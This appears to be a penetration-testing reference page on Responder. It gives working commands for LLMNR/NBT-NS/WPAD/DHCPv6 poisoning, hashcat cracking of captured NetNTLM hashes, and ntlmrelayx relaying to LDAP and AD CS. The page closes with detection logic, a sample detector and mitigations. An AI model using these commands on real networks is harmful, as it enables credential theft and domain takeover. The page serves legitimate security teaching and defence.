Responder
Overview
Responder poisons LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and mDNS (Multicast DNS) requests to capture authentication credentials on the local network. When a Windows host fails to resolve a hostname via DNS, it falls back to broadcast protocols — Responder answers these requests, directing the victim to the attacker's machine. The victim then authenticates (NTLM) to the attacker, revealing NetNTLMv2 hashes that can be cracked offline or relayed.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Prerequisites
- Network access on the same broadcast domain as the target(s)
- Root/sudo on the attacker (Responder binds to privileged ports)
- On Kali:
sudo apt install -y responder
Techniques
Basic Poisoning
# Responder
# https://github.com/lgandx/Responder
# Start Responder on the network interface
sudo responder -I eth0 -v
Responder listens for LLMNR/NBT-NS/mDNS queries and responds, capturing NTLMv2 hashes from any host that authenticates.
Analyze Mode (Passive)
Observe name resolution requests without poisoning:
# Responder
# https://github.com/lgandx/Responder
# Passive analysis — see what's on the network without poisoning
sudo responder -I eth0 -Av
WPAD Poisoning
Force authentication through a rogue Web Proxy Auto-Discovery proxy:
# Responder
# https://github.com/lgandx/Responder
# Enable WPAD and force auth
sudo responder -I eth0 -wFv
# DHCP + WPAD injection
sudo responder -I eth0 -Pvd
DHCPv6 Poisoning
# Responder
# https://github.com/lgandx/Responder
# DHCPv6 + Proxy authentication
sudo responder -I eth0 --dhcpv6 -Pv
Crack Captured Hashes
Captured hashes are saved to /usr/share/responder/logs/ (created at runtime — filenames such as SMB-NTLMv2-Client-<IP>.txt). The session database Responder.db is saved directly to /usr/share/responder/.
# Hashcat
# https://github.com/hashcat/hashcat
# Crack NetNTLMv2 — mode 5600
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# Crack NetNTLMv1 — mode 5500
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt
NTLM Relay (Instead of Cracking)
Instead of cracking hashes, relay the captured authentication to another service. Requires disabling Responder's SMB and HTTP servers so ntlmrelayx can listen:
# Edit Responder config to disable SMB and HTTP
# /etc/responder/Responder.conf
# SMB = Off
# HTTP = Off
# Start Responder (poisoning only, no auth servers)
sudo responder -I eth0 -v
# In another terminal — relay captured auth
# Impacket
# https://github.com/fortra/impacket
impacket-ntlmrelayx -tf targets.txt -smb2support
# Relay to LDAP for AD attacks
impacket-ntlmrelayx -t ldap://<dc_ip> --escalate-user <user>
# Relay to AD CS web enrollment
impacket-ntlmrelayx -t http://<ca_ip>/certsrv/certfnsh.asp --adcs --template DomainController
Key Flags
| Flag | Description |
|---|---|
| -I <interface> | Network interface to listen on |
| -v | Verbose output |
| -A | Analyze mode (passive, no poisoning) |
| -w | Start WPAD rogue proxy |
| -F | Force WPAD authentication |
| -P | Force proxy authentication |
| -d | DHCP poisoning (inject WPAD) |
| --dhcpv6 | DHCPv6 poisoning |
| -b | Return Basic auth instead of NTLM (cleartext) |
| --lm | Force LM hashing downgrade |
| --disable-ess | Disable Extended Session Security (NTLMv1 downgrade) |
| -e <IP> | Poison with external IP |
Detection Methods
Network-Based Detection
- LLMNR/NBT-NS responses from unauthorized hosts
- Multiple name resolution responses for the same query (legitimate + poisoned)
- WPAD responses from non-configured WPAD servers
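One way to implement the first two network checks over captured LLMNR datagrams, written here as an added example (not code from the Responder project): it parses the DNS-style wire format LLMNR uses and raises an alert when a second host answers the same query, or when anything answers a defender-planted canary name. The canary name, addresses and traffic are constructed for the example.

```python
import struct
from collections import defaultdict

# Hostname the defender looks up on a schedule but no real host owns; constructed for this example.
CANARY_NAMES = {"canary-share"}

def build_llmnr(txid, name, answer_ip=None):
    """Construct an LLMNR datagram (DNS wire format): a query, or a response if answer_ip is given."""
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    flags = 0x8000 if answer_ip else 0x0000  # QR bit set on responses
    msg = struct.pack("!HHHHHH", txid, flags, 1, 1 if answer_ip else 0, 0, 0) + qname + struct.pack("!HH", 1, 1)
    if answer_ip:  # answer RR: pointer to the question name, type A, class IN, TTL 30, 4-byte address
        msg += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + bytes(int(o) for o in answer_ip.split("."))
    return msg

def parse_llmnr(payload):
    """Read the header and the first question name; enough to correlate queries with responses."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", payload[:8])
    pos, labels = 12, []
    while payload[pos]:  # length-prefixed labels up to the zero terminator
        n = payload[pos]
        labels.append(payload[pos + 1:pos + 1 + n].decode("ascii").lower())
        pos += 1 + n
    return {"id": txid, "response": bool(flags & 0x8000), "name": ".".join(labels), "answers": ancount}

def detect_poisoning(datagrams):
    """datagrams: iterable of (src_ip, udp_payload). Flags canary hits and multiple responders per query."""
    responders, alerts = defaultdict(set), []
    for src, raw in datagrams:
        msg = parse_llmnr(raw)
        if not msg["response"] or msg["answers"] == 0:
            continue
        key = (msg["id"], msg["name"])
        responders[key].add(src)
        if msg["name"] in CANARY_NAMES:
            alerts.append(f"canary {msg['name']!r} answered by {src}")
        if len(responders[key]) == 2:  # fire once per query, when the second responder appears
            alerts.append(f"multiple responders for {msg['name']!r}: {sorted(responders[key])}")
    return alerts

# Constructed sample traffic: a printer lookup answered by its owner and by a poisoner, then a canary lookup.
SAMPLE = [
    ("10.0.0.20", build_llmnr(0x1A2B, "printer01")),
    ("10.0.0.7", build_llmnr(0x1A2B, "printer01", "10.0.0.7")),
    ("10.0.0.99", build_llmnr(0x1A2B, "printer01", "10.0.0.99")),
    ("10.0.0.20", build_llmnr(0x3C4D, "canary-share")),
    ("10.0.0.99", build_llmnr(0x3C4D, "canary-share", "10.0.0.99")),
]
ALERTS = detect_poisoning(SAMPLE)  # two alerts: duplicate responders for printer01, then the canary hit
```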
Host-Based Detection
- Responder process running on a host
- Unexpected NTLM authentication attempts to unknown servers
- Failed authentication events following broadcast name resolution
Mitigation Strategies
- Disable LLMNR — Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution
- Disable NBT-NS — Network adapter settings > TCP/IP > Advanced > WINS > Disable NetBIOS over TCP/IP
- Disable WPAD — Group Policy: disable "Automatically detect settings" in proxy configuration
- Require SMB signing — blocks relaying captured NTLM authentication to SMB services (relay to other protocols needs their own signing or channel-binding controls)
- Network segmentation — limit broadcast domain size